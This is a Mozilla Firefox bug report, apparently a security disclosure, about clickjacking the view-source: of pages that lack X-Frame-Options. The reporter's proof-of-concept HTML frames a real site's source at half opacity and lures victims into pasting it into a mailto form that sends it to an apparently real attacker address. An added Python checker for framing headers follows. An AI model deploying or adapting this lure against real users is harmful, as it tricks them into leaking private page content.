Closed Bug 953333 Opened 11 years ago Closed 10 years ago

clickjacking source code

Categories: Firefox :: Untriaged
Type: defect
Version: 26 Branch
Hardware: x86
OS: Windows 7
Priority: Not set
Severity: normal

Tracking

RESOLVED DUPLICATE of bug 624883

People

Reporter: akhilreni
Assignee: Unassigned

Details
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Steps to reproduce:



<html>
<body>
<style>
  body { font-family: Arial; }
  #container  { position: relative; }
  #container2 { position: relative; }
  /* The framed view-source: page. Half-transparent so the lure text underneath
     shows through and the victim selects the frame's content, not the lure. */
  #iframe2 {
    width: 800px;
    height: 500px;
    position: relative;
    top: 0; left: 0;
    filter: alpha(opacity=50); /* legacy IE opacity */
    opacity: 0.5;
  }
</style>
<div id="container">
<!-- The victim pastes the copied page source here; submitting mails it to the attacker. -->
<form action="mailto:evilhawk08@gmail.com" method="POST" enctype="multipart/form-data" name="EmailTestForm">
  copy paste here<br>
  <input type="text" name="VisitorName"><br><br>
  <input type="submit" value="Email This Form">
</form>
</div>
<div id="container2">
<h1>click down press ctrl+A and then copy it in the mail form above to receive your code</h1>
<!-- view-source: of a page that sends no X-Frame-Options header, loaded inside a frame -->
<iframe id="iframe2" src="view-source:https://sellfy.com/user/#/settings/account"></iframe>
</div>
</body>
</html>


Actual results:

Hey there,

The source code of sites missing X-Frame-Options headers can be clickjacked.
For example, if a site is missing X-Frame-Options headers, then an attacker can send a link to the
victim and lure the victim into copying the source code and sending it to the attacker.
With this, important things can indeed be revealed.

<iframe id="iframe2" src="view-source:https://sellfy.com/user/#/settings/account">


Expected results:

In Chrome, even if a site is vulnerable to clickjacking, the source code cannot be clickjacked.

I think this is a browser bug and should be fixed.

Hope you fix it soon :)

Happy Christmas
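The report's premise is that a page which sends no framing policy can be embedded by any site. As an added example (not code from the bug, the reporter, or Firefox), the following Python evaluates the two response headers that express such a policy, X-Frame-Options and the Content-Security-Policy frame-ancestors directive, and decides whether a given framer origin may embed the page. The header sets, URLs and hostnames used (partner.example, evil.example) are constructed for the demonstration. Note what this does and does not tell you: it reports what the headers request for a normal navigation; whether a browser also applies them when the target is loaded through view-source:, as in the proof of concept above, is a separate question and is exactly what this bug and bug 624883 are about.

```python
"""
Evaluate whether a response's framing headers let another origin embed it.

Added example for this report; not code from the bug, the reporter, or Firefox.
Models X-Frame-Options (RFC 7034) and the CSP frame-ancestors directive; when
both are present, frame-ancestors takes precedence, as the CSP spec requires.
"""
from urllib.parse import urlsplit

_DEFAULT_PORTS = {"http": 80, "https": 443}


def _origin(url):
    """Reduce a URL to a comparable (scheme, host, port) tuple, filling in default ports."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    return scheme, host, parts.port or _DEFAULT_PORTS.get(scheme)


def _frame_ancestors(csp_value):
    """Return the frame-ancestors source list (lower-cased), or None if the
    directive is absent. frame-ancestors does not fall back to default-src."""
    for directive in csp_value.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def _host_source_matches(source, framer, page_scheme):
    """Match one CSP host-source or scheme-source against the framer origin.
    Simplified: wildcard ports and path components are not supported."""
    if source == "*":
        return True
    if source.endswith(":") and "//" not in source:   # scheme-source, e.g. "https:"
        return framer[0] == source[:-1]
    if "://" not in source:                             # bare host inherits the page's scheme
        source = page_scheme + "://" + source
    scheme, host, port = _origin(source)
    if framer[0] != scheme or framer[2] != port:
        return False
    if host.startswith("*."):
        return framer[1].endswith(host[1:])             # "*.a.com" matches "b.a.com", not "a.com"
    return framer[1] == host


def may_frame(headers, page_url, framer_url):
    """True if a document at page_url, served with `headers`, may be embedded
    by a document at framer_url. Header names are matched case-insensitively."""
    lowered = {name.lower(): value for name, value in headers.items()}
    page, framer = _origin(page_url), _origin(framer_url)

    ancestors = _frame_ancestors(lowered.get("content-security-policy", ""))
    if ancestors is not None:
        # An empty source list, or one containing only 'none', matches nothing.
        for source in ancestors:
            if source == "'none'":
                continue
            if source == "'self'":
                if framer == page:
                    return True
            elif _host_source_matches(source, framer, page[0]):
                return True
        return False

    xfo = lowered.get("x-frame-options", "").split(",")[0].strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer == page
    # ALLOW-FROM was honoured by some browsers and dropped by others, so it is not
    # a usable policy; that and any other or missing value leave the page frameable.
    return True


if __name__ == "__main__":
    # Constructed sample: the target from the report, with and without a policy.
    target = "https://sellfy.com/user/#/settings/account"
    attacker = "https://evil.example"
    print("no headers      ->", may_frame({}, target, attacker))
    print("X-Frame-Options ->", may_frame({"X-Frame-Options": "DENY"}, target, attacker))
```

Run it against the headers a site actually returns (for example from `curl -sI`) before deciding whether the report's precondition, a missing framing policy, holds for that site; a CSP with frame-ancestors counts even when X-Frame-Options is absent, and a CSP without frame-ancestors does not help, since the directive has no default-src fallback.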
The view-source problem is known and is being discussed. Marking as a duplicate of bug 624883.
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Group: core-security → core-security-release
Group: core-security-release